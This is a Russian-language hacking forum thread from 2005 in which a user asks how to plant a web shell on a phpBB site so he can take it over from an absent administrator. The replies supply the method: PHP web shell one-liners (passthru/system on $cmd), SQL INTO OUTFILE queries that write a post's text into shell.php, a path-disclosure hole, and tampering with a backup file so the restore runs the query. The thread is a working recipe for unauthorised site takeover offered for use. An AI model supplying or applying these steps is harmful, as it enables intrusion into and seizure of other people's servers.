ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Залить шел на phpBB
  #1  
Старый 07.12.2005, 17:22
Аватар для vorishka
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
Question Залить шел на phpBB

Здрасте, народ!
Столкнулся с проблемой... Мона ли на phpBB залить шел. Если да то как расскажите подробней.
Хочу сайт забрать, а то админ на сайте появляется раз в год и них ничё не делает
 
Ответить с цитированием

  #2  
Старый 07.12.2005, 18:06
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Цитата:
SELECT post_text FROM phpbb_posts_text WHERE post_id =1234 INTO OUTFILE "/full/path/to/rw/dir/shell.php"

смотрим номер нашего поста, подставляем в post_id а запостить нужно
<? passthru($cmd); ?>

путь можно узнать дырой в скрипте /db/oracle.php
Цитата:
SELECT word FROM phpbb_words WHERE word_id = 1 INTO OUTFILE "/full/path/to/rw/dir/shell.php"

добавляем в админке наше слово (сами знаете какое) и восстанавливаем базу
Если помог, то репу мне повысь=))) А вообще Мемберу нужно самому уметь пользоваться поиском...=))) (не в обиду)
 
Ответить с цитированием

  #3  
Старый 07.12.2005, 18:45
Аватар для vorishka
vorishka
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282

Репутация: 112
По умолчанию

<<YaYaYa>> Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...
 
Ответить с цитированием

  #4  
Старый 07.12.2005, 18:51
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

А что ты не понял? Через мускул заливаешь шел вот таким образом... по-моему все ясно
 
Ответить с цитированием

  #5  
Старый 07.12.2005, 18:53
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

а ты себя не мучай посмотри на rst.void.ru там вроде есть экспл для заливки шелла=)
не понял как это))
инфа с секьюрити сайтов канешна=)
сначала создаем топик с <? system($cmd) ?>
потом с помощью скуля той строкой которую ЙаЙа дал записываем название той темы в файл=) так что ЙаЙа повысь репу за инфу а мне за объяснение гы)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #6  
Старый 07.12.2005, 18:55
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

m0nzt3r поддерживаю=))
 
Ответить с цитированием

  #7  
Старый 07.12.2005, 18:58
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

Цитата:
Блин скажи лучше от куда слил инфу? Нифига не понял... Наверно я тупой...
это вставляеться в место где проходит скуль инъекция.
но врядли пройдет такая маза, думаю прав не хватит
 
Ответить с цитированием

  #8  
Старый 07.12.2005, 19:04
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Цитата:
Известно что когда бы делаешь backup, скачивается файл, содержащий mysql-запросы, которые выполняются после восстановления.
Предположим что админ криво настроил с-му и у mysqld есть права на запись в какуюто папку))
Тогда мы бекапаем базу, потом редактируем чтобы выполнялся
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
пишем соответствующий пост, чтобы его текст оказался в файле. Потом восстанавливаем базу, и запрос
SELECT ... FROM phpbb_posts WHERE ...=... INTO OUTFILE "/../../..... ..."
выполняется
vorishka думаю теперь понятно будет.........
 
Ответить с цитированием

  #9  
Старый 07.12.2005, 19:22
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

k1b0rg ну может у него доступ в админку есть))
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #10  
Старый 07.12.2005, 19:36
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Цитата:
Сообщение от m0nzt3r  
ну может у него доступ в админку есть))
Если бы у него не было бы лоступа в админку, то он бы спрашивал как получить этот самый доступ, а не как залить шел. Я так думаю)))
А вообще по моим постам думаю все ясно. Хотя это не всегда проходит, т.к. папка куда ты хочешь залить шел должна быть открыта на запись, а таких папок иногда бывает не много=)) Поэтому придется помутить с этим.
ЗЫ жадные вы на репутацию)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Очередные дыры: phpBB 2.0.14 rsha1988 Форумы 8 08.05.2005 18:48
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25
Дыра в phpbb привела к массовым взломам сайтов ФРАЙ Мировые новости 7 19.12.2004 08:10
Как залить шелл через PhPBB SheFF Форумы 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ